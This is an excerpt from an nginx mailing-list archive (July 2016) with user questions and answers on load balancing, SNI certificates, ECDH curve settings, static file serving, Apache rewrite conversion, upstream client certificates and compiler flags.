16:04:48 -0500 Subject: basic nginx setup help as load balancer In-Reply-To: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> References: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> Message-ID: Thank you. In my setup all 3 servers in the upstream block will answer requests for "myapplication.net" . Knowing that, would you say my config I have is sufficient? On Tue, Jul 5, 2016 at 1:42 PM, Reinis Rozitis wrote: > But I am confused on a few concepts here. First of all, should my server >> name in the "upstream" directive be the same name in the "server_name" >> directive in the "server" stanza? Here is what I have so far: >> > > And to recap, should my server name in the "upstream" directive be the >> same name in the "server_name" directive in the "server" stanza? >> > > > It is not a requirement, but depending on how your backend servers are > configured (if they are namebased virtualhosts) you may need to specify > correct Host header. > > > By default nginx sends whatever it is given in the proxy_pass directive. > > Taking your configuration for example: > > upstream myapplication.net { > server 1.net; > server 2.net; > server 3..net; > } > > location { > proxy_pass http://myapplication.net; > } > > > 1. On startup Nginx will resolve the 1.net .. 3.net hostnames > 2. Will send to whatever upstream server IP (not using the upstream > hostsnames) it has chosen a request for 'myapplication.net' (Host). It > also doesn't use server_name. > > If the backend has a namebased configuration and there is no > 'myapplication'net' virtualhost (or it isnt the default one) the whole > request will genereally fail (not return what was expected). > > If that is the case you either need to configure the upstream block (which > for nginx is just a virtual name) and the proxy_pass to match your backend > configuration or usually people just add additional header: > > location { > proxy_pass http://myapplication.net; > proxy_set_header Host $host; > } > > This way nginx sends to backend the actual hostname from request. > > Of course you can use also $server_name (or any other variable > http://nginx.org/en/docs/varindex.html or even static value) but usually > server_name is something like .domain.com (for wildcard matching) so it > may confuse the backend. > > rr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From crohmann at netcologne.de Wed Jul 6 06:57:55 2016 From: crohmann at netcologne.de (Christian Rohmann) Date: Wed, 6 Jul 2016 08:57:55 +0200 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> On 07/04/2016 12:31 PM, Sushma wrote: > Or is there a way, nginx will be able to dynamically figure out the cert to > be presented without it being explicitly mentioned via the directive > ssl_certificate? After some research not statically by configuration. But using a bit of lua could offer a way to maybe make this happen. Something like: https://litespeed.io/dynamic-tls-certificates-with-openresty-and-ssl_certificate_by_lua/ Regards Christian From pratyush at hostindya.com Wed Jul 6 04:54:03 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Wed, 06 Jul 2016 10:24:03 +0530 Subject: basic nginx setup help as load balancer In-Reply-To: Message-ID: An HTML attachment was scrubbed... URL: From florian at bottledsoftware.de Wed Jul 6 07:15:59 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Wed, 6 Jul 2016 09:15:59 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705181614.GT30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: Hi Maxim! Thanks for investigating this! I thought ssl_ecdh_curve was only used to specific curves for ECDHE. Is there any way to know what curves "auto" will include on my system? ?Florian > On 05 Jul 2016, at 20:16, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 05:02:07PM +0200, Florian Reinhart wrote: > >> It is the same certificate on both servers and it is indeed a >> secp256r1 aka prime256v1 certificate. So does this mean, I have >> to use prime256v1 for ssl_ecdh_curve with this certificate? It?s >> still strange that it used to work before... > > Since version 1.11.0 nginx uses the new SSL_CTX_set1_curves_list() > interface if available to configure supported curves, instead of > previously used EC_KEY_new_by_curve_name()/SSL_CTX_set_tmp_ecdh(). > This new interface is generally better as it allows configuring > multiple curves. > > I've just tested, and it looks like this new interface is also > more strict. With previous interface it was possible to use any > certificate regardless of the ssl_ecdh_curve setting, and that's > why it worked for you in older versions. The new interface does > not allow to use curves which are not listed at all, including > certificates using these curves. > > Solution would be to list all curves you want to use, including > curves used by certificates, e.g.: > > ssl_ecdh_curve secp384r1:prime256v1; > > Or, better yet, just leave the default ("auto"), it will allow > most common curves as supported by OpenSSL. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From kurt at x64architecture.com Wed Jul 6 09:32:59 2016 From: kurt at x64architecture.com (Kurt Cancemi) Date: Wed, 6 Jul 2016 05:32:59 -0400 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: Hello, The following are in auto: secp256r1 secp521r1 brainpool512r1 brainpoolP384r1 secp384r1 brainpoolP256r1 secp256k1 If not configured with OPENSSL_NO_EC2M sect571r1 sect571k1 sect409k1 sect409r1 sect283k1 sect283r1 #endif From OpenSSL source: https://github.com/openssl/openssl/blob/OpenSSL_1_0_2-stable/ssl/t1_lib.c#L266 Kurt Cancemi https://www.x64architecture.com > On Jul 6, 2016, at 03:15, Florian Reinhart wrote: > > Hi Maxim! > > Thanks for investigating this! I thought ssl_ecdh_curve was only used to specific curves for ECDHE. > > Is there any way to know what curves "auto" will include on my system? > > ?Florian From nginx-forum at forum.nginx.org Wed Jul 6 10:34:53 2016 From: nginx-forum at forum.nginx.org (NemoPang) Date: Wed, 06 Jul 2016 06:34:53 -0400 Subject: Erro 499 help Message-ID: My web architecture is: nginx(reverse proxy) -> nginx + php-fpm It's normal when i curl it on pc(linux shell and pc Browser). This's nginx(reverse proxy) access.log: 117.136.40.0 - - [06/Jul/2016:17:38:31 +0800] "GET /a.php HTTP/1.1" 200 66 ....... It's not normal when i access it on my phone(android Browser). But it will be normal sometimes. 117.136.40.0 - - [06/Jul/2016:17:40:09 +0800] "GET /a.php HTTP/1.1" 499 0 ....... 117.136.40.0 - - [06/Jul/2016:17:40:18 +0800] "GET /a.php HTTP/1.1" 200 66 ...... If I set "proxy_ignore_client_abort on" on nginx's config. Access_log will be this: 117.136.40.0 - - [06/Jul/2016:17:40:18 +0800] "GET /a.php HTTP/1.1" 200 0 ...... Please help me! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268108,268108#msg-268108 From r at roze.lv Wed Jul 6 10:56:11 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 6 Jul 2016 13:56:11 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> Message-ID: <17EB8B77C0E64A3CB2C3781443B4A784@MasterPC> > Thank you. In my setup all 3 servers in the upstream block will answer > requests for "myapplication.net" . Knowing that, would you say my config I > have is sufficient? It should be yes. rr From r at roze.lv Wed Jul 6 11:02:24 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 6 Jul 2016 14:02:24 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: Message-ID: > I'm new to servers and proxies, > But don't you think running both nginx and Apache on port 80 of same machine will cause one of those to fail to start. > In my opinion backend should be on different IP:port combination. > Please correct me if I'm wrong. It is correct (though you can work arround it by backend (apache) listening only on 127.0.0.1 interface and nginx as frontend on the real ip). But to me the initial posters configuration excerpt looked like having just generic comments not representing the actual case. rr -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 6 12:33:53 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 6 Jul 2016 15:33:53 +0300 Subject: How to leverage HTTP upstream features In-Reply-To: <577C1FD3.1040107@teamaol.com> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> <577C1FD3.1040107@teamaol.com> Message-ID: <20160706123353.GU30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 05:00:03PM -0400, Charles Orth wrote: > I'm new to nginx... > I would like to define upstream handler in HTTP without a HTTP server > listener. From SMTP/POP3/IMAP I would like > to use the upstream handler for my http endpoint. Thus requiring > http_upstream initialize, create a request, hand the request off to upstream > for processing and finally having HTTP upstream handler return the entire > response to my handler. > I haven't found any examples or patches where I can leverage HTTP upstream > from Mail service perspective. > Does anyone have a suggestion or an example? This is not something you can do. Mail and http are different modules, and you can't use http module features in the mail module. If you want to use upstreams in mail, you have to reimplement them there. Practical solution is to use one address in mail (e.g., 127.0.0.1:8080) and additionally balance requests using http reverse proxy, e.g.: mail { auth_http 127.0.0.1/mailauth; ... } http { upstream backends { server 127.0.0.2:8080; ... } server { listen 8080; location /mailauth { proxy_pass http://backends; } } } -- Maxim Dounin http://nginx.org/ From kerozin.joe at gmail.com Wed Jul 6 12:38:58 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Wed, 6 Jul 2016 14:38:58 +0200 Subject: Nginx static file serving - Some files are 404, some not Message-ID: I have the following server configuration block: > > > > > > > > > > > > > > > > > > > > > > > > > *server { # Running port listen 80; # ipv4 listen > [::]:80; # ipv6 server_name localhost; root > /var/www/html; # Proxying the connections connections location / > { proxy_pass http://app ; > proxy_redirect off; proxy_set_header Host $host; > proxy_set_header X-Real-IP $remote_addr; proxy_set_header > X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header > X-Forwarded-Host $server_name; } location ~ > ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) > { root /var/www/html/public; access_log off; expires max; > } error_page 401 403 404 /404.html; error_page 500 502 503 504 > /50x.html;}* > I want to server my static files with Nginx to my Node/Express app. I not want to re-factore every single route in my app, that's why i want to server all these static files into / URL path. The problem is some files cannot be located on the disk, although they existing, for example */images/art/lindon.png*. This is a docker-compose stack and nginx built from source: https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile The error message that I got for a missing file: *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() > "/var/www/html/public/images/art/lindon.png" failed (2: No such file or > directory), client: 10.0.2.2, server: localhost, request: "GET > /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: > "http://127.0.0.1/hu/blog/mariya-balazs > "* > Is there any better way to server static files for the / URL without blocking* location / {}*? Thank You for your help! Istv?n -------------- next part -------------- An HTML attachment was scrubbed... URL: From kerozin.joe at gmail.com Wed Jul 6 13:44:49 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Wed, 6 Jul 2016 15:44:49 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: Sorry, the parent folder, /images/art was uncommented in .gitignore, that's why didn't uploaded into my repo. Problem solved. Still, is there any method to share static files? Something like expose the public folder into / URL, but without blocking the route? 2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > I have the following server configuration block: > > >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> *server { # Running port listen 80; # ipv4 listen >> [::]:80; # ipv6 server_name localhost; root >> /var/www/html; # Proxying the connections connections location / >> { proxy_pass http://app ; >> proxy_redirect off; proxy_set_header Host $host; >> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >> X-Forwarded-Host $server_name; } location ~ >> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >> { root /var/www/html/public; access_log off; expires max; >> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >> /50x.html;}* >> > > I want to server my static files with Nginx to my Node/Express app. I not > want to re-factore every single route in my app, that's why i want to > server all these static files into / URL path. > > The problem is some files cannot be located on the disk, although they > existing, for example */images/art/lindon.png*. > > This is a docker-compose stack and nginx built from source: > > https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile > > The error message that I got for a missing file: > > *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >> directory), client: 10.0.2.2, server: localhost, request: "GET >> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >> "http://127.0.0.1/hu/blog/mariya-balazs >> "* >> > > Is there any better way to server static files for the / URL without > blocking* location / {}*? > > Thank You for your help! > > Istv?n > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 6 16:08:19 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 6 Jul 2016 19:08:19 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: <20160706160819.GX30781@mdounin.ru> Hello! On Wed, Jul 06, 2016 at 09:15:59AM +0200, Florian Reinhart wrote: > Is there any way to know what curves "auto" will include on my > system? This is not currently possible, AFAIK, and depends on the OpenSSL library used. Here is a short summary for varions OpenSSL version I've previously looked into: - OpenSSL 1.0.2, 1.0.2a: all curves supported, strongest first. Full list is available via "openssl ecparam -list_curves". - OpenSSL 1.0.2b ... 1.0.2h: limited default list with at least 256 bits, prime256v1 (aka P-256) first. List in OpenSSL 1.0.2g is as follows: P-256:P-521:brainpoolP512r1:brainpoolP384r1:P-384:brainpoolP256r1:secp256k1:B-571:K-571:K-409:B-409:K-283:B-283 - Upcoming OpenSSL 1.1.0 uses X25519:P-256:P-521:P-384 (aka X25519:secp256r1:secp521r1:secp384r1). -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Wed Jul 6 16:50:14 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Wed, 6 Jul 2016 18:50:14 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: location / only means 'a location which starts with /'. Basically, this catches every single request, and is the least specific way (lowest precedence ever) to do so. When choosing the most suitable location block, nginx will most of the time use a more specific one. That is why this is called 'default location'. One way I understand your question: If you want to have a specific behavior for the '/' path, you could use location = / which matches only this *exact* path and has the highest precedence, as a match with the requested path makes this block immediately selected. Another way: If you want to first browse your filesystem and fall back (in case no file matches) to proxying the request to backends, that is not what your current configuraiton file tells nginx to do. You would need something like: location / { try_files $uri $uri/ @fallback; autoindex on; } location @fallback { } --- *B. R.* On Wed, Jul 6, 2016 at 3:44 PM, Lantos Istv?n wrote: > Sorry, the parent folder, /images/art was uncommented in .gitignore, > that's why didn't uploaded into my repo. Problem solved. > > Still, is there any method to share static files? Something like expose > the public folder into / URL, but without blocking the route? > > 2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > >> I have the following server configuration block: >> >> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> *server { # Running port listen 80; # ipv4 listen >>> [::]:80; # ipv6 server_name localhost; root >>> /var/www/html; # Proxying the connections connections location / >>> { proxy_pass http://app ; >>> proxy_redirect off; proxy_set_header Host $host; >>> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >>> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >>> X-Forwarded-Host $server_name; } location ~ >>> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >>> { root /var/www/html/public; access_log off; expires max; >>> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >>> /50x.html;}* >>> >> >> I want to server my static files with Nginx to my Node/Express app. I not >> want to re-factore every single route in my app, that's why i want to >> server all these static files into / URL path. >> >> The problem is some files cannot be located on the disk, although they >> existing, for example */images/art/lindon.png*. >> >> This is a docker-compose stack and nginx built from source: >> >> https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile >> >> The error message that I got for a missing file: >> >> *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >>> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >>> directory), client: 10.0.2.2, server: localhost, request: "GET >>> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >>> "http://127.0.0.1/hu/blog/mariya-balazs >>> "* >>> >> >> Is there any better way to server static files for the / URL without >> blocking* location / {}*? >> >> Thank You for your help! >> >> Istv?n >> >> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Wed Jul 6 17:02:25 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Wed, 6 Jul 2016 19:02:25 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: Check out try_files. http://nginx.org/en/docs/http/ngx_http_core_module.html#try_files On Wed, Jul 6, 2016 at 3:44 PM, Lantos Istv?n wrote: > Sorry, the parent folder, /images/art was uncommented in .gitignore, > that's why didn't uploaded into my repo. Problem solved. > > Still, is there any method to share static files? Something like expose > the public folder into / URL, but without blocking the route? > > 2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > >> I have the following server configuration block: >> >> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> *server { # Running port listen 80; # ipv4 listen >>> [::]:80; # ipv6 server_name localhost; root >>> /var/www/html; # Proxying the connections connections location / >>> { proxy_pass http://app ; >>> proxy_redirect off; proxy_set_header Host $host; >>> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >>> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >>> X-Forwarded-Host $server_name; } location ~ >>> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >>> { root /var/www/html/public; access_log off; expires max; >>> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >>> /50x.html;}* >>> >> >> I want to server my static files with Nginx to my Node/Express app. I not >> want to re-factore every single route in my app, that's why i want to >> server all these static files into / URL path. >> >> The problem is some files cannot be located on the disk, although they >> existing, for example */images/art/lindon.png*. >> >> This is a docker-compose stack and nginx built from source: >> >> https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile >> >> The error message that I got for a missing file: >> >> *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >>> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >>> directory), client: 10.0.2.2, server: localhost, request: "GET >>> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >>> "http://127.0.0.1/hu/blog/mariya-balazs >>> "* >>> >> >> Is there any better way to server static files for the / URL without >> blocking* location / {}*? >> >> Thank You for your help! >> >> Istv?n >> >> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From agentzh at gmail.com Thu Jul 7 05:55:01 2016 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Wed, 6 Jul 2016 22:55:01 -0700 Subject: SNI support for nginx In-Reply-To: <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> Message-ID: Hello! On Tue, Jul 5, 2016 at 11:57 PM, Christian Rohmann wrote: > On 07/04/2016 12:31 PM, Sushma wrote: >> Or is there a way, nginx will be able to dynamically figure out the cert to >> be presented without it being explicitly mentioned via the directive >> ssl_certificate? > > After some research not statically by configuration. But using a bit of > lua could offer a way to maybe make this happen. Something like: > https://litespeed.io/dynamic-tls-certificates-with-openresty-and-ssl_certificate_by_lua/ > Aye. CloudFlare, for example, has been using ssl_certificate_by_lua* with the ngx.ssl Lua module to lazily load a *lot* of SSL certificates and private keys from remote services (via nonblocking IO) only on demand in its global SSL gateway network for long. With lazy loading and local caching (via lua_shared_dict and/or lua-resty-lrucache), the flexibility and performance can be both excellent. You can not only look up your SSL credentials via SNI, but also via the server IP address the client is accessing (for older SSL clients that do not support TLS SNI). The formal documentation for this feature is: https://github.com/openresty/lua-nginx-module/#ssl_certificate_by_lua_block https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/ssl.md#readme Even dynamic OCSP stapling is supported ;) The easiest way to get everything setup is to use the OpenResty bundle BTW: http://openresty.org/en/ Have fun! Best regards, -agentzh From charles.orth at teamaol.com Thu Jul 7 12:42:55 2016 From: charles.orth at teamaol.com (Charles Orth) Date: Thu, 07 Jul 2016 08:42:55 -0400 Subject: How to leverage HTTP upstream features In-Reply-To: <20160706123353.GU30781@mdounin.ru> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> <577C1FD3.1040107@teamaol.com> <20160706123353.GU30781@mdounin.ru> Message-ID: <577E4E4F.3000806@teamaol.com> Thanks Maxim, The loopback feature you described is the work around we're using. However, the new service I'm attempting to implement, it is costly on several fronts. My impression of reimplementation of upstream was what I was suspecting all along. Thanks Maxim Dounin wrote: > Hello! > > On Tue, Jul 05, 2016 at 05:00:03PM -0400, Charles Orth wrote: > > >> I'm new to nginx... >> I would like to define upstream handler in HTTP without a HTTP server >> listener. From SMTP/POP3/IMAP I would like >> to use the upstream handler for my http endpoint. Thus requiring >> http_upstream initialize, create a request, hand the request off to upstream >> for processing and finally having HTTP upstream handler return the entire >> response to my handler. >> I haven't found any examples or patches where I can leverage HTTP upstream >> from Mail service perspective. >> Does anyone have a suggestion or an example? >> > > This is not something you can do. Mail and http are different > modules, and you can't use http module features in the mail > module. If you want to use upstreams in mail, you have to > reimplement them there. > > Practical solution is to use one address in mail (e.g., > 127.0.0.1:8080) and additionally balance requests using http > reverse proxy, e.g.: > > mail { > auth_http 127.0.0.1/mailauth; > ... > } > > http { > upstream backends { > server 127.0.0.2:8080; > ... > } > > server { > listen 8080; > > location /mailauth { > proxy_pass http://backends; > } > } > } > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From daniel at linux-nerd.de Thu Jul 7 16:49:21 2016 From: daniel at linux-nerd.de (Daniel) Date: Thu, 7 Jul 2016 18:49:21 +0200 Subject: Rewrite Rules from apache Message-ID: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Hi Everyone, i try to convert some rules from apache htaccess to nginx. This is my htaccess Rule: RewriteCond %{DOCUMENT_ROOT}/$3 -f RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 I tried these options but it seems not working: if (-f $document_root/$3){ set $rule_0 1$rule_0; } if ($rule_0 = "1"){ rewrite ^/(.*?)/(.*?)/(.*)$ /$3; } Anyone have a good idea? Cheers Daniel From pratyush at hostindya.com Thu Jul 7 17:19:38 2016 From: pratyush at hostindya.com (pratyush at hostindya.com) Date: Thu, 07 Jul 2016 17:19:38 +0000 Subject: Rewrite Rules from apache In-Reply-To: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Message-ID: <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com> July 7 2016 10:19 PM, "Daniel" wrote: > Hi Everyone, > > i try to convert some rules from apache htaccess to nginx. > > This is my htaccess Rule: > > RewriteCond %{DOCUMENT_ROOT}/$3 -f > RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 > > I tried these options but it seems not working: > > if (-f $document_root/$3){ > set $rule_0 1$rule_0; > } > if ($rule_0 = "1"){ > rewrite ^/(.*?)/(.*?)/(.*)$ /$3; > } > > Anyone have a good idea? > > Cheers > > Daniel > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx how about location ^/(.*?)/(.*?)/(.*)/(.*)$ { try_files /$3 $uri =404; } From daniel at linux-nerd.de Thu Jul 7 17:26:36 2016 From: daniel at linux-nerd.de (Daniel) Date: Thu, 7 Jul 2016 19:26:36 +0200 Subject: Rewrite Rules from apache In-Reply-To: <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com> References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com> Message-ID: Same issue. All images CSS Files and so on are not loaded :( > Am 07.07.2016 um 19:19 schrieb pratyush at hostindya.com: > > July 7 2016 10:19 PM, "Daniel" wrote: >> Hi Everyone, >> >> i try to convert some rules from apache htaccess to nginx. >> >> This is my htaccess Rule: >> >> RewriteCond %{DOCUMENT_ROOT}/$3 -f >> RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 >> >> I tried these options but it seems not working: >> >> if (-f $document_root/$3){ >> set $rule_0 1$rule_0; >> } >> if ($rule_0 = "1"){ >> rewrite ^/(.*?)/(.*?)/(.*)$ /$3; >> } >> >> Anyone have a good idea? >> >> Cheers >> >> Daniel >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > how about > > location ^/(.*?)/(.*?)/(.*)/(.*)$ { > try_files /$3 $uri =404; > } > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From weijiesheng at gmail.com Thu Jul 7 20:08:01 2016 From: weijiesheng at gmail.com (Jason/Jiesheng Wei) Date: Thu, 7 Jul 2016 13:08:01 -0700 Subject: nginx as the proxy that provides client certificate and faced connection attempt failed talk to upstream server Message-ID: Hey, I'm using nginx for windows as a reverse proxy to upstream server. The upstream server requires client certificate and thus in the nginx config, I put the following: location / { proxy_ssl_certificate_key cert.key; proxy_ssl_certificate cert.crt; proxy_pass https://upstream; } and the key and cert are pem format. However, when I send request to the nginx proxy, it returns 504 gateway timeout and the error log is 10060: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond) while reading response header from upstream And I confirmed by curl with the cert files above directly to the upstream and it worked. Can someone please help understand what could be wrong here? Thanks, Jason From francis at daoine.org Fri Jul 8 07:38:36 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 8 Jul 2016 08:38:36 +0100 Subject: Rewrite Rules from apache In-Reply-To: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Message-ID: <20160708073836.GL12280@daoine.org> On Thu, Jul 07, 2016 at 06:49:21PM +0200, Daniel wrote: Hi there, > This is my htaccess Rule: > > RewriteCond %{DOCUMENT_ROOT}/$3 -f > RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 I suspect that some previous part of the htaccess file has a regex which sets $3. What is that? Or, alternatively: What http request do you make? What response do you want? As in, what file on your filesystem do you want nginx to return, for this request? f -- Francis Daly francis at daoine.org From kerozin.joe at gmail.com Fri Jul 8 12:44:00 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 14:44:00 +0200 Subject: Optimization flags Message-ID: The default --with-cc-opt flags for Nginx are these: *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > However I added more optimizations, which are against the standard: *--with-cc-opt='-g -Ofast -march=native -ffast-math > -fstack-protector-strong -Wformat -Werror=format-security > -Wp,-D_FORTIFY_SOURCE=2'* > So far I don't experience any bug, but I do have a higher benchmark: 380-450 req/s compared to the original 290-310 req/s with cached Node/Express app on my laptop. Is it safe to use -O3 or -Ofast flags with Nginx? Is it possible to build Nginx with clang? If so, should I symlink it to gcc (I use Docker, this way gcc executable is trashed) or is there a way to define the compiler with a flag? -------------- next part -------------- An HTML attachment was scrubbed... URL: From kerozin.joe at gmail.com Fri Jul 8 13:19:18 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 15:19:18 +0200 Subject: Optimization flags In-Reply-To: References: Message-ID: Seems like --with-cc=clang flag is where I can define clang compiler. Is it safe to use with --with-cc-opt='-std=c11 ...? I think clang uses C11 anyway. 2016-07-08 14:44 GMT+02:00 Lantos Istv?n : > The default --with-cc-opt flags for Nginx are these: > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat >> -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* >> > > However I added more optimizations, which are against the standard: > > *--with-cc-opt='-g -Ofast -march=native -ffast-math >> -fstack-protector-strong -Wformat -Werror=format-security >> -Wp,-D_FORTIFY_SOURCE=2'* >> > > So far I don't experience any bug, but I do have a higher benchmark: > 380-450 req/s compared to the original 